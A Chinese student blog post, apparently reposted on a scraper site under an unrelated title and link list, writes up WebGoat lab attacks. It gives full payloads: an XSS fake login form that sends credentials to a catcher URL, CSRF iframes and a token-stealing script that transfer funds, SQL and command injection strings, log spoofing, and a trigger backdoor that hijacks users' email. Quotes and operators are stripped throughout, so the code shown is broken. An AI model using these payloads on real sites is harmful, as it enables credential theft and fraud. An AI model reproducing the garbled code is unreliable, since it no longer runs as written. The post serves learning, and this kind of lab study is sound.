当前位置: 首页 > news >正文

西部数码网站管理助手 mssql网站怎么做能提升ip流量

西部数码网站管理助手 mssql,网站怎么做能提升ip流量,主要的cms系统有哪些,湖南平台网站建设制作博客目录 一、实践内容 跨站脚本攻击XSS跨站请求伪造CSRFSQL注入攻击二、实验中遇到的问题及解决三、基础问题回答四、实验总结一、实践内容 本实践的目标理解常用网络攻击技术的基本原理。Webgoat实践下相关实验。具体过程#xff1a; 跨站脚本攻击XSS跨站请求伪造CSRFSQL注入…博客目录 一、实践内容 跨站脚本攻击XSS跨站请求伪造CSRFSQL注入攻击二、实验中遇到的问题及解决三、基础问题回答四、实验总结一、实践内容 本实践的目标理解常用网络攻击技术的基本原理。Webgoat实践下相关实验。具体过程 跨站脚本攻击XSS跨站请求伪造CSRFSQL注入攻击 跨站脚本攻击XSS 使用XSS钓鱼(Phishing with XSS) 使用XSS和HTML插入将html插入到请求凭证中添加JavaScript实际收集凭据将请求凭证发布到http://localhost:8080/WebGoat/catcher?PROPERTYyes...这谷歌翻译的是人话吗。。我理解的意思是html的源代码是可以被修改的生成一个包含form的html并且写一个js实现将form提交的内容发送给攻击者这里用弹窗alert做示例既然弹窗能做到那么偷偷将数据传给攻击者也是没问题的。代码如下script function hack() { alert(Had this been a real attack... Your credentials were just stolen. User Name document.forms[0].user.value Password document.forms[0].pass.value); //将输入框里面的内容获取并显示 XSSImagenew Image; XSSImage.srchttp://localhost/WebGoat/catcher?PROPERTYyesuserdocument.forms[0].user.value password document.forms[0].pass.value ;} //将这些信息发送给捕获这些信息的WebGoat。 /script form brbrHR H3This feature requires account login:/H3 brbrEnter Username:br input typetext iduser nameuserbrEnter Password:br input typepassword name passbr input typesubmit namelogin valuelogin onclickhack() /form br HR 生成的html网页弹窗成功反射性XSS(Reflected XSS) 当在输入框中插入脚本点击提交后能立即看到效果数据传到了后台就是反射性XSS攻击。在输入框中输入scriptalert(Youre an idiot!);/script提交后就可以看到弹窗说明我们也可以写一段脚本把数据传到某个网址或者服务器 CSRF攻击 跨站请求伪造(CSRF) 跨站请求伪造是一种让受害者加载一个包含网页的图片的一种攻击手段。当受害者的浏览器试图打开页面时它会使用指定的参数向 图片包含的网页的页面发送请求。浏览器认为将会得到一个图片但实际上是一种资金转移功能。该请求将包括与网站相关的任何 cookies。因此如果用户已经通过网站的身份验证 并有一个永久的cookie甚至是当前会话的cookie网站将没有办法区分这是否是一个从合法用户发出的请求。通过这种方法攻击者可以让受害者执行一些他们本来没打算执行的操作如注销、采购项目或者这个脆弱的网站提供的任何其他功能。在这一课中您的目的是向一个新闻组发送一封邮件邮件中包含一张图片这个图像的URL指向一个恶意请求。无论谁收到这封邮件并恰好已经通过身份验证他的资金将会被转走。在消息框中嵌入html代码。iframe srcattack?Screen280menu900transferFunds5000 /iframe iframe srcattack?Screen280menu900transferFundsCONFIRM /iframe注意Screen和menu参数在网站右边查看每个人不一样关于是localhost还是127.0.0.1你自己登陆WebGoat的时候用的是啥这里就写啥对应不上可能没法做题。在Message List中生成以Title命名的链接点击进入后攻击成功绕过CSRF确认(CSRF Prompt By‐Pass) 网页中所有手动发起的请求操作其实质是通过 HTMLJavaScript 向服务器发起请求。我们的目标是给新闻组发送一封带有多个威胁请求的 Email。第一个请求用户资金转账第二个用于自动处理第一个请求所触发的确认。URL必须使用以下两个外部参数“transferFunds4000”和“transferFundsCONFIRM”。可以通过在左侧链接中右键鼠 标复制快捷方式完成URL获取。任何收到该邮件的人若正好已经通过认证则当其访问该页面时将自动完成资金转账。同样的不同WebGoat环境的URL中“Screen”和“Menu”参数可能会有所区别。使用当前访问URL中正在使用的参数。造一个类似于 CSRF 实验中的图片或 iframe 标记:img srchttp://127.0.0.1:8080/attack?Screen272menu900transferFunds5000 width1 height1 / 该图片请求不会导致资金转移而是触发一个需要用户确认的信息。代码如下iframesrchttp://127.0.0.1:8080/WebGoat/attack?Screen272menu900transferFunds5000 idmyFrame frameborder1 marginwidth0marginheight0 width800 scrollingyes height300 onloaddocument.getElementById(frame2).srchttp://127.0.0.1:8080/WebGoat/attack?Screen272menu900transferFundsCONFIRM; /iframe iframeidframe2 frameborder1 marginwidth0 marginheight0 width800 scrollingyes height300 /iframe 第二个请求必须在第一个请求结束后被载入。所以需要添加js以实现在第一个请求结束后自动载入第二个:在第一个 frame 的属性中添加onload参数,设置 src 为第二个 frame。将这段代码提交到消息框中发表。提交后可以看到上面的frame是显示了用户确认信息是之前的请求所触发的结果。第二个frame显示的是我们伪造的确认请求触发的结果5000元已经转账。刷新页面可以看到完成课程。对于图片来说如果载入的是一个 HTML 则会触发一个错误。所以此处可通过替换 onload 属性实现工具目的。img srcattack?Screen272menu900transferFunds5000 width1 height1 img srcattack?Screen272menu900transferFundsconfirm width1 height1 在输入框中插入代码提交消息后点击页面刷新后通过。绕过 CSRF Token(CSRF Token By-Pass) 跨站请求伪造攻击(CSRF/XSRF)欺骗已获取系统信任用户点击带有伪造请求的页面从而执行相关命令。基于 Token(令牌)的请求认证用于阻止此类攻击者。该技术在请求发起页面插入 Token。Token 用于完成请求和并验证该操作不是通过脚本执行的、网页中所有手工发起的请求操作其实质通过 HTMLJavaScript 向服务器发起请求。“与 CSRF 课程类似您的目标是给新闻组发送包含恶意请求的 Email 实现资金转账。为了成功完成欺骗您需要获得一个验证请求 Token。显示转账表单的 URL 类似于 CSRF 课程 中使用的外部参数transferFundsmain。载入该页面读取 Token 并追加到伪造请求中以实现资金转账。”查看网站生成的资金转账页面的表单内容。http://127.0.0.1:8080/WebGoat/attack?Screen296menu900transferFundsmain查看源代码看到Token参数form accept-charsetUNKNOWN idtransferForm methodPOST action#attack/296/900 enctypeapplication/x-www-form-urlencodedinput nametransferFunds typetext value0input nameCSRFToken typehidden value920130483input typesubmit/form 由此可以看到伪造命令需要提交CSRFToken参数在一个 iframe 中载入页面然后从该 frame 中读取出 Token。 下面查看网页源代码找到 Token 参数。从教程里面找了段代码 通过 frame‐form 的路径可以读取并保存 CSRFToken 参数。script var readToken function(){ var doc document.getElementById(frame1).contentDocument var token doc.getElementsByName(CSRFToken)[0].getAttribute(value); alert(token); var frame2 document.getElementById(frame2); frame2.src http://127.0.0.1:8080/WebGoat/attack?Screen296menu900transferFunds4000CSRFTokentoken; } /script iframe idframe2 /iframe iframe idframe1 onloadreadToken() srchttp://127.0.0.1:8080/WebGoat/attack?Screen296menu900transferFundsmain /iframe 点击后会弹窗显示token。 SQL注入攻击 命令注入(Command Injection) 在正常的参数提交过程中添加恶意的代码往往能够得到以外的收获比如执行系统命令。点击firebug就是工具栏的虫子(bug)调试网页源代码。在所请求的页面源代码中添加 netstat -an ipconfig添加到哪里呢哪里都行复选框里面某一项后面加上双引号就会执行这条系统命令。可以看到命令所产生的效果数字型SQL注入(Numeric SQL Injection) 在 station 字段中注入特征字符能组合成新的 SQL 语句。SELECT * FROM weather_data WHERE station [station]通过注入SQL字符串的方式查看所有的天气数据。先来看不攻击的情况查看哥伦比亚看到的就是哥伦比亚的天气。这个很简单同样是查看源代码在比如说哥伦比亚天气value101里面加入一个or 11因为11是恒等式加上or就使得这一个sql语句变成了SELECT * FROM weather_data WHERE station 101 or 11这样station右边的等号永远成立也不会查找station101的城市天气直接select全部城市的天气。全部城市的天气都能看到日志欺骗(Log Spoofing) 灰色区域代表在 Web 服务器的日志中的记录的内容。我们的目的是使用户名为“admin” 的用户在日志中显示“成功登录”。可以通过在日志文件中插入脚本实现。在文本框中输入用户名webgoat Login Succeeded for username admin这样用户名信息在同一行显示没什么用。如果我们能在这一行中加入回车之类的不就可以变成两行了啊加入回车(0D%)和换行符(%0A)在username中填入webgoat%0d%0aLogin Succeeded for username: admin可以看到本来只有一行的Login failed变成了两行下面是我们的邪恶目的Login Succeded for username : admin。这说明我们可以向日志文件中添加恶意脚本脚本的返回信息管理员能够通过浏览器看到。admin scriptalert(document.cookie)/script作为用户名输入管理员可以看到弹窗的cookie信息。字符串型注入(String SQL Injection) 由于网页的html代码中给password的框限定了最大长度为8我将其修改至30。否则要注入的永真式长度大于最大长度将会注入失败。以用户Neville登录还是以永真式的形式输入密码·Smith or 11 --·:攻击成功得到所有人员列表10.数据库后门Database Backdoors 数据库通常作为一个Web应用程序的后端来使用。此外它也用来作为存储的媒介。它也可以被用来作为存储恶意活动的地方如触发器。触发器是在数据库管理系统上调用另一个数据库操作如insert,select,update or delete。举个例子攻击者可以创建一个触发器该触发器在创建新用户时将每个新用户的Email地址设置为攻击者的地址。我们的Login ID是101.步骤输入101得到该用户的信息输入注入语句101; update employee set salary10000由于要执行两个语句中间需要用分号分隔使用以下查询条件添加触发器101;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET emailjohnhackme.com WHERE userid NEW.userid,便可看到攻击成功二、实验中遇到的问题及解决 1.jdk不匹配 解决根据同学提供的教程下载了1.8这一版本适配webgoat7.0 三、基础问题回答 1SQL注入攻击原理如何防御 SQL注入即是指web应用程序对用户输入数据的合法性没有判断攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句以此来实现欺骗数据库服务器执行非授权的任意查询从而进一步得到相应的数据信息。SQL注入攻击的典型手段判断应用程序是否存在注入漏洞收集信息、并判断数据库类型根据注入参数类型重构SQL语句的原貌猜解表名、字段名获取账户信息、攻击web或为下一步攻击做准备。至于如何防范SQL注入攻击首先是将普通用户与系统管理员用户的权限分离加强对用户输入的验证杜绝各种符号的使用。测试字符串变量的内容只接受所需的值。拒绝包含二进制数据、转义序列和注释字符的输入内容。这有助于防止脚本注入防止某些缓冲区溢出攻击。测试用户输入内容的大小和数据类型强制执行适当的限制与转换。这即有助于防止有意造成的缓冲区溢出对于防治注入式攻击有比较明显的效果。2XSS攻击的原理如何防御 XSS又叫CSS(Cross Site Script)跨站脚本攻击。因为和CSS层叠样式表重名改叫xss。它指的是恶意攻击者往Web页面里插入恶意html代码当用户浏览该页之时嵌入其中Web里面的html代码会被执行从而达到恶意用户的特殊目的获取用户的一些信息。 xss攻击可以分成三种类型存储型和反射性和DOM反射型攻击经过后端不经过数据库存储型经过后端经过数据库。DOM不经过后端,DOM—based XSS漏洞是基于文档对象模型Document Objeet Model,DOM)的一种漏洞是通过url传入参数去控制触发的。想要防御XSS攻击主要通过在表单提交或者url参数传递前对需要的参数进行严格过滤还有就是检查用户输入的内容中是否有非法内容如尖括号,、引号,等严格控制。3CSRF攻击原理如何防御 CSRFCross-site request forgery跨站请求伪造也被称为“One Click Attack”或者Session Riding通常缩写为CSRF或者XSRF是一种对网站的恶意利用。尽管听起来像跨站脚本XSS但它与XSS非常不同XSS利用站点内的信任用户而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比CSRF攻击往往不大流行因此对其进行防范的资源也相当稀少和难以防范所以被认为比XSS更具危险性。目前防御 CSRF 攻击主要有一下策略在 HTTP 头中自定义属性并验证。通过 referer、token 或者 验证码 来检测用户提交。尽量不要在页面的链接中暴露用户隐私信息。对于用户修改删除等操作最好都使用post 操作 。避免全站通用的cookie严格设置cookie的域。四、 实践总结与体会 做实验的时候刚上完信息系统安全上次课讲得sql注入攻击这节课讲了xss攻击相当于复习了一波也有了新收获实验上完了知识留下了感觉阔以。。 转载于:https://www.cnblogs.com/jhs888/p/10925876.html
http://www.pierceye.com/news/858077/

相关文章:

  • discuz 手机网站模板山东省住房建设厅网站首页
  • 网站建设违约责任条款枣庄专业做网站
  • python做爬虫和做网站做两个一摸一样的网站
  • 网站做微信登录asp.net做网站头部和尾部_都用什么来实现
  • 南充哪里做网站太原关键词优化公司
  • 哪个网站做的ppt模板好投放广告网站
  • 公司网站中新闻中心怎样做优化百度浏览器电脑版
  • 厦门网站建设 九来外国做视频在线观看网站
  • 用.net做购物网站山东建筑公司实力排名
  • 做百度推广网站找谁好宁夏省建筑信息平台
  • phpcmsv9手机网站源码网站开发ide php
  • 学校网站建设成功案例微信公众号网站导航怎么做
  • 重庆汽车网站建设建立大安全大应急框架
  • 重庆模板建站定制网站做企业网站到哪里找
  • asp技术做网站网站建设推广是什么工作室
  • 运营公众号还是做网站室内装修设计软件哪个好用
  • 卖营销软件的网站如何利用站群做网站
  • 网站空间价格怎么算网站制作与发布
  • 做网站的动态图片廊坊做网站哪家好
  • 建设企业网站报价怎么做网站logo
  • 企业类网站谷歌seo招聘
  • asp.net网站安装顺序idc 公司网站模板
  • 新手学做网站优化2022app分类排行
  • 微信微网站制作公司2008年做的网站
  • 网站建设柒首先金手指1男孩做网站
  • 葫芦岛市建设局网站网页制作与网站发布
  • 企业网站首页布局尺寸营销网站建设哪家便宜
  • 专题网站建设策划郑州市做网站的公
  • wordpress網頁版天津百度网站排名优化
  • 做网站建设销售工资代做电大网站ui作业